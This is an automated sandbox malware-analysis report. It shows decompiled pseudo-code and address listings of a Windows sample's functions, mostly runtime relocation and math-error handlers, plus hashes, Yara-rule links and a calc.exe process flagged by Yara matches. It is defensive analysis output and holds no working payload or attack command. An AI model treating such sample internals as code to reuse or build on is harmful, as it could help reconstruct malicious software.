																			_t198 = _t253;
																			_t189 =  *_t170 - _t157 + _t229;
																			__eflags = _t189;
																			 *(_t209 - 0x58) = _t189;
																			_t180 = _t253;
																			E00401AE0(_t132, _t135, _t165, _t170, _t180, _t253, _t202, _t224, _t238, _t249, _t253, 0);
																			goto L53;
																		}
																	}
																}
															} else {
																r8d =  *_t170 & 0x0000ffff;
																_t180 = _t253;
																_t198 = _t253;
																__eflags = r8w;
																_t227 =  <  ? _t224 | 0xffff0000 : _t224;
																_t228 = ( <  ? _t224 | 0xffff0000 : _t224) - _t157;
																_t224 = ( <  ? _t224 | 0xffff0000 : _t224) - _t157 + _t229;
																 *(_t209 - 0x58) = _t224;
																r8d = 2;
																E00401AE0(_t132, _t135, _t165, _t170, _t180, _t253, _t202, _t224, _t238, _t249, _t253, 0);
																goto L53;
															}
															goto L92;
															L53:
															_t202 = _t202 + 0xc;
															__eflags = _t202 - _t238;
														} while (_t202 < _t238);
														goto L35;
													} else {
														goto L27;
													}
												}
											} else {
												_t55 = _t202 + 0xc; // 0x0
												_t114 =  *_t55;
												_t202 = _t202 + 0xc;
												__eflags = _t202;
												goto L44;
											}
										}
									} else {
										L31:
										__eflags = _t202 - _t238;
										if(_t202 < _t238) {
											_t44 = _t202 + 8; // 0x405538
											_t252 = _t44;
											_t248 =  *0x4053a0; // 0x400000
											_t198 = _t209 - 0x58;
											_t47 = (_t238 + 7 - _t252 >> 3) * 8; // 0x405538
											_t243 = _t202 + _t47 + 8;
											while(1) {
												r8d = 4;
												_t70 =  *_t202;
												_t202 = _t252;
												_t170 = _t170 + _t248;
												 *(_t209 - 0x58) = _t70 +  *_t170;
												E00401AE0(_t132, _t135, _t165, _t170, _t198, _t198, _t202, _t224, _t243, _t248, _t252, _t254);
												__eflags = _t252 - _t243;
												if(_t252 == _t243) {
													break;
												}
												_t252 = _t252 + 8;
												__eflags = _t252;
											}
											L35:
											_t67 =  *0x408624;
											__eflags = _t67;
											if(_t67 > 0) {
												do {
													r8d =  *( *0x408628 + _t202);
													__eflags = r8d;
													if(r8d != 0) {
														Sleep();
													}
													_t97 = _t97 + 1;
													_t202 = _t202 + 0x28;
													__eflags = _t97 -  *0x408624;
												} while (_t97 <  *0x408624);
											}
										}
										goto L27;
									}
								}
							}
						} else {
							L27:
							return _t67;
						}
					} else {
						_t201 = _t201 + _t201 * 4 << 3;
						_t161 =  *0x408628 + _t201;
						_t161[8] = _t237;
						 *_t161 = 0;
						E004028B0(_t161);
						_t190 = _t213 + 0x20;
						r8d = 0x30;
						_t162 =  *0x408628;
						 *((long long*)(_t162 + _t201 + 0x18)) = _t161 + _t169;
						Sleep(??);
						if(_t162 == 0) {
							_t151 =  *0x408628;
							_t224 =  *((intOrPtr*)(_t151 + _t201 + 0x18));
							E00402C80(__eflags, _t165, "  VirtualQuery failed for %d bytes at address %p", _t190, _t201, _t224, _t229);
							goto L25;
						} else {
							_t92 =  *(_t213 + 0x44);
							if((_t162 - 0x00000004 & 0xfffffffb) == 0) {
								L9:
								 *0x408624 =  *0x408624 + 1;
								goto L10;
							} else {
								_t92 = _t92 - 0x00000040 & 0xffffffbf;
								if(_t92 != 0) {
									_t206 = _t201 +  *0x408628;
									r8d = 0x40;
									_t192 =  *((intOrPtr*)(_t213 + 0x38));
									_t231 = _t206;
									 *((long long*)(_t206 + 8)) =  *((intOrPtr*)(_t213 + 0x20));
									 *((long long*)(_t206 + 0x10)) =  *((intOrPtr*)(_t213 + 0x38));
									Sleep(??);
									__eflags = _t92;
									if(__eflags != 0) {
										goto L9;
									} else {
										Sleep();
										E00402C80(__eflags, _t165, "  VirtualProtect failed with code 0x%x", _t192, _t206, _t224, _t231);
										goto L21;
									}
								} else {
									goto L9;
								}
							}
							goto L14;
						}
					}
				}
				L92:
			}




















































                                          0x00401ae0
                                          0x00401ae0
                                          0x00401ae0
                                          0x00401ae0
                                          0x00401ae0
                                          0x00401ae0
                                          0x00401ae4
                                          0x00401ae5
                                          0x00401ae6
                                          0x00401aea
                                          0x00401af3
                                          0x00401af6
                                          0x00401af9
                                          0x00401afc
                                          0x00401c68
                                          0x00000000
                                          0x00401b02
                                          0x00401b09
                                          0x00401b0b
                                          0x00401b10
                                          0x00401b10
                                          0x00401b16
                                          0x00000000
                                          0x00401b18
                                          0x00401b18
                                          0x00401b1c
                                          0x00401b26
                                          0x00401bb5
                                          0x00401bb8
                                          0x00401be3
                                          0x00401be5
                                          0x00401be8
                                          0x00401bed
                                          0x00401bf0
                                          0x00401bf5
                                          0x00401bf7
                                          0x00401bfa
                                          0x00401bfa
                                          0x00401bfc
                                          0x00401bfe
                                          0x00401c06
                                          0x00401c08
                                          0x00401c08
                                          0x00401c0e
                                          0x00401bba
                                          0x00401bbe
                                          0x00401c54
                                          0x00401c59
                                          0x00401c5b
                                          0x00401c5f
                                          0x00401bc4
                                          0x00401bc6
                                          0x00401bc8
                                          0x00401bd0
                                          0x00401bd2
                                          0x00401c71
                                          0x00401c76
                                          0x00401c76
                                          0x00401bd2
                                          0x00401bc6
                                          0x00401bbe
                                          0x00401bd8
                                          0x00401be2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401b26
                                          0x00000000
                                          0x00401b2c
                                          0x00401b2c
                                          0x00401b2f
                                          0x00401b33
                                          0x00401b37
                                          0x00401b37
                                          0x00401b3a
                                          0x00401b42
                                          0x00401b45
                                          0x00401c9d
                                          0x00401c9d
                                          0x00401ca4
                                          0x00401ca7
                                          0x00401cb0
                                          0x00401cb1
                                          0x00401cb3
                                          0x00401cb5
                                          0x00401cb7
                                          0x00401cb9
                                          0x00401cba
                                          0x00401cbb
                                          0x00401cbc
                                          0x00401cc0
                                          0x00401cc8
                                          0x00401cce
                                          0x00401cd0
                                          0x00401ce3
                                          0x00401ced
                                          0x00401d04
                                          0x00401d09
                                          0x00401d10
                                          0x00401d1a
                                          0x00401d29
                                          0x00401d33
                                          0x00401d36
                                          0x00401d3a
                                          0x00000000
                                          0x00401d3c
                                          0x00401d3c
                                          0x00401d40
                                          0x00401d42
                                          0x00401e10
                                          0x00401e10
                                          0x00401e12
                                          0x00000000
                                          0x00401e18
                                          0x00401e18
                                          0x00401e18
                                          0x00401e1b
                                          0x00401e1d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401e1d
                                          0x00401d48
                                          0x00401d48
                                          0x00401d4a
                                          0x00401df4
                                          0x00401df7
                                          0x00401df9
                                          0x00000000
                                          0x00401dff
                                          0x00401dff
                                          0x00401e02
                                          0x00401e04
                                          0x00401e23
                                          0x00401e23
                                          0x00401e26
                                          0x00401e29
                                          0x00401f5e
                                          0x00401f5e
                                          0x00401f65
                                          0x00401f74
                                          0x00401f76
                                          0x00401f7b
                                          0x00401fe0
                                          0x00401fe5
                                          0x004020a7
                                          0x004020ac
                                          0x004020b0
                                          0x00000000
                                          0x004020b6
                                          0x004020c0
                                          0x004020c5
                                          0x00000000
                                          0x004020c5
                                          0x00401feb
                                          0x00401feb
                                          0x00402024
                                          0x00402029
                                          0x00000000
                                          0x0040202b
                                          0x0040202b
                                          0x00402030
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402030
                                          0x00401fed
                                          0x00401fed
                                          0x00401ff2
                                          0x00000000
                                          0x00401ff8
                                          0x00401ff8
                                          0x00401ffd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401ffd
                                          0x00401ff2
                                          0x00401feb
                                          0x00401f7d
                                          0x00401f7d
                                          0x00401f82
                                          0x00401fff
                                          0x00402006
                                          0x0040200b
                                          0x0040200f
                                          0x0040208a
                                          0x0040208f
                                          0x00000000
                                          0x00402011
                                          0x00402011
                                          0x00402011
                                          0x00402014
                                          0x00000000
                                          0x00402016
                                          0x0040201b
                                          0x0040201d
                                          0x00402023
                                          0x00402023
                                          0x00402014
                                          0x00401f84
                                          0x00401f84
                                          0x00401f89
                                          0x00402094
                                          0x00402094
                                          0x0040209a
                                          0x00401f8f
                                          0x00401f8f
                                          0x00402060
                                          0x00402065
                                          0x00402032
                                          0x00402039
                                          0x0040203e
                                          0x00402042
                                          0x004020da
                                          0x004020df
                                          0x00000000
                                          0x00402048
                                          0x00402048
                                          0x0040204b
                                          0x00000000
                                          0x00402051
                                          0x00402056
                                          0x00402058
                                          0x0040205e
                                          0x0040205e
                                          0x0040204b
                                          0x00402067
                                          0x00402067
                                          0x0040206c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040206c
                                          0x00401f95
                                          0x00401f95
                                          0x00401f9a
                                          0x00000000
                                          0x00401fa0
                                          0x00401fa0
                                          0x00401fa5
                                          0x0040206e
                                          0x00402077
                                          0x00401fab
                                          0x00401fb2
                                          0x00401fb7
                                          0x00401fbb
                                          0x004020fa
                                          0x004020ff
                                          0x00401fc1
                                          0x00401fc1
                                          0x00401fc4
                                          0x00402106
                                          0x00402106
                                          0x00401fca
                                          0x00401fcf
                                          0x00401fd1
                                          0x00401fd1
                                          0x00401fd1
                                          0x00401fc4
                                          0x00401fd3
                                          0x00401fd7
                                          0x00401fd7
                                          0x00401fa5
                                          0x00401f9a
                                          0x00401f8f
                                          0x00401f89
                                          0x00401f82
                                          0x00401e2f
                                          0x00401e2f
                                          0x00401e36
                                          0x00401e44
                                          0x00401e48
                                          0x00401e4b
                                          0x00401e95
                                          0x00401e9a
                                          0x00401e9a
                                          0x00401e9e
                                          0x00401ea1
                                          0x00401ea4
                                          0x00401ea7
                                          0x00401eaa
                                          0x00401e52
                                          0x00401f10
                                          0x00401f13
                                          0x00000000
                                          0x00401f15
                                          0x00401f15
                                          0x00401f19
                                          0x00401f1c
                                          0x00401f29
                                          0x00401f2c
                                          0x00401f30
                                          0x00401f33
                                          0x00401f36
                                          0x00401f3a
                                          0x00401f40
                                          0x00000000
                                          0x00401f40
                                          0x00401e58
                                          0x00401e58
                                          0x00401e5b
                                          0x00401ee2
                                          0x00401ee5
                                          0x00401eeb
                                          0x00401eee
                                          0x00401ef2
                                          0x00401ef8
                                          0x00401efb
                                          0x00401efe
                                          0x00401f02
                                          0x00401f05
                                          0x00000000
                                          0x00401e61
                                          0x00401e61
                                          0x00401e64
                                          0x00401f4a
                                          0x00401f51
                                          0x00401f59
                                          0x00000000
                                          0x00401e6a
                                          0x00401e6d
                                          0x00401e73
                                          0x00401e79
                                          0x00401e79
                                          0x00401e7c
                                          0x00401e80
                                          0x00401e83
                                          0x00000000
                                          0x00401e83
                                          0x00401e64
                                          0x00401e5b
                                          0x00401eac
                                          0x00401eac
                                          0x00401eb0
                                          0x00401eb3
                                          0x00401ec0
                                          0x00401ec4
                                          0x00401ec8
                                          0x00401ecb
                                          0x00401ece
                                          0x00401ed2
                                          0x00401ed8
                                          0x00000000
                                          0x00401ed8
                                          0x00000000
                                          0x00401e88
                                          0x00401e88
                                          0x00401e8c
                                          0x00401e8c
                                          0x00000000
                                          0x00401e4d
                                          0x00000000
                                          0x00401e4d
                                          0x00401e4b
                                          0x00401e06
                                          0x00401e06
                                          0x00401e06
                                          0x00401e09
                                          0x00401e09
                                          0x00000000
                                          0x00401e09
                                          0x00401e04
                                          0x00401d50
                                          0x00401d50
                                          0x00401d50
                                          0x00401d53
                                          0x00401d59
                                          0x00401d59
                                          0x00401d61
                                          0x00401d68
                                          0x00401d73
                                          0x00401d73
                                          0x00401d84
                                          0x00401d87
                                          0x00401d90
                                          0x00401d92
                                          0x00401d95
                                          0x00401d9a
                                          0x00401d9d
                                          0x00401da2
                                          0x00401da5
                                          0x00000000
                                          0x00000000
                                          0x00401d80
                                          0x00401d80
                                          0x00401d80
                                          0x00401da7
                                          0x00401da7
                                          0x00401db6
                                          0x00401db8
                                          0x00401dc0
                                          0x00401dca
                                          0x00401dcd
                                          0x00401dd0
                                          0x00401ddd
                                          0x00401ddd
                                          0x00401de0
                                          0x00401de3
                                          0x00401de7
                                          0x00401de7
                                          0x00401def
                                          0x00401db8
                                          0x00000000
                                          0x00401d53
                                          0x00401d4a
                                          0x00401d42
                                          0x00401cd2
                                          0x00401cd2
                                          0x00401ce2
                                          0x00401ce2
                                          0x00401b4b
                                          0x00401b56
                                          0x00401b5a
                                          0x00401b5d
                                          0x00401b61
                                          0x00401b67
                                          0x00401b71
                                          0x00401b76
                                          0x00401b7f
                                          0x00401b86
                                          0x00401b8b
                                          0x00401b94
                                          0x00401c80
                                          0x00401c93
                                          0x00401c98
                                          0x00000000
                                          0x00401b9a
                                          0x00401b9a
                                          0x00401ba4
                                          0x00401bae
                                          0x00401bae
                                          0x00000000
                                          0x00401ba6
                                          0x00401ba9
                                          0x00401bac
                                          0x00401c10
                                          0x00401c17
                                          0x00401c22
                                          0x00401c27
                                          0x00401c2a
                                          0x00401c2e
                                          0x00401c32
                                          0x00401c38
                                          0x00401c3a
                                          0x00000000
                                          0x00401c40
                                          0x00401c40
                                          0x00401c4f
                                          0x00000000
                                          0x00401c4f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401bac
                                          0x00000000
                                          0x00401ba4
                                          0x00401b94
                                          0x00401b45
                                          0x00000000

                                          APIs
                                          Strings
                                          • VirtualQuery failed for %d bytes at address %p, xrefs: 00401C87
                                          • Address %p has no image-section, xrefs: 00401C9D
                                          • VirtualProtect failed with code 0x%x, xrefs: 00401C46
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 3472027048-2123141913
                                          • Opcode ID: 009181a245aff6ef445387d92d105cf0ee4685033511d3ea1fb50670c612dbd3
                                          • Instruction ID: 0ff9c74c3dd4a3289e8a5341e0d3a7873433fb4732e445c0b7cb1ba3c6e08f83
                                          • Opcode Fuzzy Hash: 009181a245aff6ef445387d92d105cf0ee4685033511d3ea1fb50670c612dbd3
                                          • Instruction Fuzzy Hash: 9251E0B3701A4086EB108F26E94076E77B0F749BA4F45862ADF49673A4EF3CC985C708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004016B0, Relevance: 6.3, APIs: 5, Instructions: 56sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 7f7fc0f53d45bd75bd3c4cb3a83ecfa2ff56e4b09fd7f39b0d5ea84d5f557e91
                                          • Instruction ID: 254d00bd779215c18f10d0ad7d2e7bcb5969ed05ee86bf94add43d9758e35c63
                                          • Opcode Fuzzy Hash: 7f7fc0f53d45bd75bd3c4cb3a83ecfa2ff56e4b09fd7f39b0d5ea84d5f557e91
                                          • Instruction Fuzzy Hash: 4F118C66666A1092FB104B25FC0435672A0B748BB1F080A75DF9C53BB8DA3CC985C708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004019B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Unknown error, xrefs: 00401AA0
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-3474627141
                                          • Opcode ID: 6038688d2016c3cacb717f8740e6f6ebc977a0456b266facbc7950e4997e5b51
                                          • Instruction ID: 1243af7c6401a27af54f90fff412e7329b8e4ab7279abf970a447c29890498fd
                                          • Opcode Fuzzy Hash: 6038688d2016c3cacb717f8740e6f6ebc977a0456b266facbc7950e4997e5b51
                                          • Instruction Fuzzy Hash: 6E018462914E84C2D6168F1CD8413EB7374FF9979AF645316EB893A260DB39C543CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401A50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          • Argument singularity (SIGN), xrefs: 00401A50
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-2468659920
                                          • Opcode ID: e3983232fa043e500741fffaef1a06592adaca8d552e74c46c18a40e25c8defc
                                          • Instruction ID: f2b75dfe1caa1b6cd68a1a8f3efaf5b64938c0a260eb8fe3960e53da8b2987de
                                          • Opcode Fuzzy Hash: e3983232fa043e500741fffaef1a06592adaca8d552e74c46c18a40e25c8defc
                                          • Instruction Fuzzy Hash: 9EF09062914E8482C2029F1CA8003ABB370FF8E789F285316EF893A564DB38C643C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401A60, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Overflow range error (OVERFLOW), xrefs: 00401A60
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-4064033741
                                          • Opcode ID: da50996ff9d3f047c8a551ce364ba223c934e3c31daf11b938a355a777195d75
                                          • Instruction ID: 7eb7fd24d127d123f1f55bbe25c7efb83e85b308bc9bc520cf2eb630f82fab9b
                                          • Opcode Fuzzy Hash: da50996ff9d3f047c8a551ce364ba223c934e3c31daf11b938a355a777195d75
                                          • Instruction Fuzzy Hash: 79F03062914E8482D2129F1DA8003ABB374FF9E799F685316EF893A564DB38D643C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401A70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • The result is too small to be represented (UNDERFLOW), xrefs: 00401A70
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-2187435201
                                          • Opcode ID: 2c7e40280f0abf18f2e4220ebf233a301df4b2933f0a031ede601a1f601bfcbb
                                          • Instruction ID: 3459dad5d5c9bb8be9886ea3c35465723ae3349a1cdc1927f1296f2a0ff4f163
                                          • Opcode Fuzzy Hash: 2c7e40280f0abf18f2e4220ebf233a301df4b2933f0a031ede601a1f601bfcbb
                                          • Instruction Fuzzy Hash: 76F03062914E8482D2129F1DA8003ABB374FF9E799F685316EF893A564DB38D643C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401A80, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Total loss of significance (TLOSS), xrefs: 00401A80
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-4273532761
                                          • Opcode ID: b1a34ffb3d83bbe1fe2eebbac6114716b3aff6e0e047cc6dedd9c338e1b0226b
                                          • Instruction ID: 2bf77a377d0af22ab9cb6f7b354871aaca4afea1477ae84831b1871b8ed73733
                                          • Opcode Fuzzy Hash: b1a34ffb3d83bbe1fe2eebbac6114716b3aff6e0e047cc6dedd9c338e1b0226b
                                          • Instruction Fuzzy Hash: 71F03662914E4482D2119F1DA4003ABB374FF9D799F685316EF893A564DB38D643C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401A90, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Partial loss of significance (PLOSS), xrefs: 00401A90
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-4283191376
                                          • Opcode ID: 8ec145af7103ab3b97adc0e5e0af2071b1c61c468a838eaf481dff2faa64d025
                                          • Instruction ID: 05a027b3b66c4f069badce151b4c38d7752ce5a8e384b773250bcb4ebd454d7a
                                          • Opcode Fuzzy Hash: 8ec145af7103ab3b97adc0e5e0af2071b1c61c468a838eaf481dff2faa64d025
                                          • Instruction Fuzzy Hash: A3F03062914E8482D2129F1DA8003ABB374FF9E799F685316EF893A564DB38D643CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004019E1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401A19
                                          • Argument domain error (DOMAIN), xrefs: 004019E1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: exit
                                          • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 2483651598-2713391170
                                          • Opcode ID: 480f274ccbfb6a87acc1cf6382df9f06c01fc3233f462f1734b3c30e6d0f1a4e
                                          • Instruction ID: 9a9f8ccb18fab7e1d3302f942af38fa40162aaa94c4f3a2e6057802bf60d1b5a
                                          • Opcode Fuzzy Hash: 480f274ccbfb6a87acc1cf6382df9f06c01fc3233f462f1734b3c30e6d0f1a4e
                                          • Instruction Fuzzy Hash: 42F03066914F8482D2129F19A8003ABB374FF9E799F685316EF893A564DB28D6438704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004024E0, Relevance: 5.0, APIs: 4, Instructions: 42sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.228347104.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.228341440.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228352803.0000000000404000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228359069.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228364492.000000000040C000.00000020.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.228368923.000000000040D000.00000080.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep$free
                                          • String ID:
                                          • API String ID: 426930369-0
                                          • Opcode ID: edf147f7424f970e2ac08dae71c3e4df1e606b02a276360439ad6cc0c93ca9bc
                                          • Instruction ID: 3a15f9fa30391c082549a048a1836ae5e64de89cfa013020cfb67896dc026096
                                          • Opcode Fuzzy Hash: edf147f7424f970e2ac08dae71c3e4df1e606b02a276360439ad6cc0c93ca9bc
                                          • Instruction Fuzzy Hash: C10125B1701A0196DF18EB55EEA436623A0F794B40F94547AC75DA73E0EFBCC885874C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: calc.exe PID: 5856 Parent PID: 5116 calc.exeCOMMON

                                          Executed Functions

                                          Function 00419DFB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 2MA$2MA
                                          • API String ID: 2738559852-947276439
                                          • Opcode ID: f1238f9f86dc67b99bd6d0eaea593e22597746cd463824faf6b43bca8ea3f192
                                          • Instruction ID: 5bc123baf9c8ace32231d907cc8b1256f6b8fc27c8f239a349308354e045dd87
                                          • Opcode Fuzzy Hash: f1238f9f86dc67b99bd6d0eaea593e22597746cd463824faf6b43bca8ea3f192
                                          • Instruction Fuzzy Hash: 5DF0F9B6200108AFCB14CF99DC95EEB77A9EF8C754F158649FE1D97241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419D4B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
